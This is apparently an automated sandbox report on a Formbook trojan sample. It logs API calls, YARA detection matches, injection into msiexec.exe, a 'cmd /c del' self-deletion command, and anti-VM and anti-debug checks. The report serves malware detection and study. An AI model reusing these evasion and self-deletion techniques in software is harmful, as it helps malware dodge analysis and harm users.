Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9A10 NtQuerySection,	10_2_043F9A10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9A00 NtProtectVirtualMemory,	10_2_043F9A00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9670 NtQueryInformationProcess,	10_2_043F9670
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9A80 NtOpenDirectoryObject,	10_2_043F9A80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9730 NtQueryVirtualMemory,	10_2_043F9730
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043FA710 NtOpenProcessToken,	10_2_043FA710
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9B00 NtSetValueKey,	10_2_043F9B00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9770 NtSetInformationFile,	10_2_043F9770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043FA770 NtOpenThread,	10_2_043FA770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F9760 NtOpenProcess,	10_2_043F9760
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043FA3B0 NtGetContextThread,	10_2_043FA3B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F97A0 NtUnmapViewOfSection,	10_2_043F97A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A28280 NtReadFile,	10_2_02A28280
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A283B0 NtAllocateVirtualMemory,	10_2_02A283B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A28300 NtClose,	10_2_02A28300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A281D0 NtCreateFile,	10_2_02A281D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A28222 NtCreateFile,	10_2_02A28222
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A283AA NtAllocateVirtualMemory,	10_2_02A283AA

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_0040102E	3_2_0040102E
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_0041B8FB	3_2_0041B8FB
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00408C6C	3_2_00408C6C
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00408C70	3_2_00408C70
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_0041B57A	3_2_0041B57A
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00402D88	3_2_00402D88
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_0041C58A	3_2_0041C58A
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B4B090	3_2_00B4B090
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00BF1002	3_2_00BF1002
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B54120	3_2_00B54120
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B3F900	3_2_00B3F900
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B6EBB0	3_2_00B6EBB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C841F	10_2_043C841F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04471002	10_2_04471002
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043CB090	10_2_043CB090
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B0D20	10_2_043B0D20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04481D55	10_2_04481D55
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043D4120	10_2_043D4120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043BF900	10_2_043BF900
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043D6E30	10_2_043D6E30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043EEBB0	10_2_043EEBB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A2B8FB	10_2_02A2B8FB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A12FB0	10_2_02A12FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A18C6C	10_2_02A18C6C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A18C70	10_2_02A18C70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A2C58A	10_2_02A2C58A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A12D88	10_2_02A12D88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A12D90	10_2_02A12D90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A2B57A	10_2_02A2B57A

Source: wREFu91LXZ.exe, 00000001.00000003.227334681.000000000263F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs wREFu91LXZ.exe
Source: wREFu91LXZ.exe, 00000003.00000002.284453440.0000000000A4F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs wREFu91LXZ.exe
Source: wREFu91LXZ.exe, 00000003.00000002.284645298.0000000000C2F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs wREFu91LXZ.exe

Source: C:\Windows\SysWOW64\msiexec.exe

Section loaded: sfc.dll

Jump to behavior

Source: wREFu91LXZ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@12/7

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3728:120:WilError_01

Source: wREFu91LXZ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\wREFu91LXZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: wREFu91LXZ.exe	Virustotal: Detection: 31%
Source: wREFu91LXZ.exe	ReversingLabs: Detection: 53%

Source: C:\Users\user\Desktop\wREFu91LXZ.exe

File read: C:\Users\user\Desktop\wREFu91LXZ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wREFu91LXZ.exe 'C:\Users\user\Desktop\wREFu91LXZ.exe'
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Process created: C:\Users\user\Desktop\wREFu91LXZ.exe 'C:\Users\user\Desktop\wREFu91LXZ.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\wREFu91LXZ.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Process created: C:\Users\user\Desktop\wREFu91LXZ.exe 'C:\Users\user\Desktop\wREFu91LXZ.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\wREFu91LXZ.exe'	Jump to behavior

Source:	Binary string: msiexec.pdb source: wREFu91LXZ.exe, 00000003.00000002.284421615.0000000000A40000.00000040.00000001.sdmp
Source:	Binary string: msiexec.pdbGCTL source: wREFu91LXZ.exe, 00000003.00000002.284421615.0000000000A40000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: wREFu91LXZ.exe, 00000001.00000003.226799711.0000000002330000.00000004.00000001.sdmp, wREFu91LXZ.exe, 00000003.00000002.284645298.0000000000C2F000.00000040.00000001.sdmp, msiexec.exe, 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: wREFu91LXZ.exe, msiexec.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\wREFu91LXZ.exe

Unpacked PE file: 3.2.wREFu91LXZ.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_004062F6 pushfd ; ret	3_2_004062F7
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_0041B3C5 push eax; ret	3_2_0041B418
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_004153FC push eax; retf	3_2_0041540B
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_0041B47C push eax; ret	3_2_0041B482
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_0041B412 push eax; ret	3_2_0041B418
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_0041B41B push eax; ret	3_2_0041B482
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00415CE7 pushad ; ret	3_2_00415D4B
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_0041C4EE push 133511A3h; retf	3_2_0041C4F3
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00414D71 push ss; iretd	3_2_00414D72
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00415D38 pushad ; ret	3_2_00415D4B
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B8D0D1 push ecx; ret	3_2_00B8D0E4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0440D0D1 push ecx; ret	10_2_0440D0E4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A162F6 pushfd ; ret	10_2_02A162F7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A253FC push eax; retf	10_2_02A2540B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A2B3C5 push eax; ret	10_2_02A2B418
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A25CE7 pushad ; ret	10_2_02A25D4B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A2C4EE push 133511A3h; retf	10_2_02A2C4F3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A2B412 push eax; ret	10_2_02A2B418
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A2B41B push eax; ret	10_2_02A2B482
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A2B47C push eax; ret	10_2_02A2B482
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A25D38 pushad ; ret	10_2_02A25D4B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_02A24D71 push ss; iretd	10_2_02A24D72

Source: C:\Windows\SysWOW64\msiexec.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 0000000002A185F4 second address: 0000000002A185FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 0000000002A1898E second address: 0000000002A18994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\wREFu91LXZ.exe

Code function: 3_2_004088C0 rdtsc

3_2_004088C0

Source: C:\Windows\explorer.exe TID: 5224	Thread sleep time: -45000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1332	Thread sleep time: -46000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000005.00000000.246941784.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.247439928.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.270829033.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.247849993.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000005.00000000.270872903.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000005.00000000.246941784.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.246941784.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.240221570.0000000004E61000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
Source: explorer.exe, 00000005.00000000.248432954.0000000008907000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#5&r
Source: explorer.exe, 00000005.00000000.246941784.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\wREFu91LXZ.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\wREFu91LXZ.exe

Code function: 3_2_004088C0 rdtsc

3_2_004088C0

Source: C:\Users\user\Desktop\wREFu91LXZ.exe

Code function: 3_2_00409B30 LdrLoadDll,

3_2_00409B30

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 1_2_021906DA mov eax, dword ptr fs:[00000030h]	1_2_021906DA
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 1_2_02190A1C mov eax, dword ptr fs:[00000030h]	1_2_02190A1C
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 1_2_0219099F mov eax, dword ptr fs:[00000030h]	1_2_0219099F
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 1_2_021909DE mov eax, dword ptr fs:[00000030h]	1_2_021909DE
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 1_2_021908EE mov eax, dword ptr fs:[00000030h]	1_2_021908EE
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B6F0BF mov ecx, dword ptr fs:[00000030h]	3_2_00B6F0BF
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B6F0BF mov eax, dword ptr fs:[00000030h]	3_2_00B6F0BF
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B6F0BF mov eax, dword ptr fs:[00000030h]	3_2_00B6F0BF
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B790AF mov eax, dword ptr fs:[00000030h]	3_2_00B790AF
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00B39080 mov eax, dword ptr fs:[00000030h]	3_2_00B39080
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Code function: 3_2_00BB3884 mov eax, dword ptr fs:[00000030h]	3_2_00BB3884
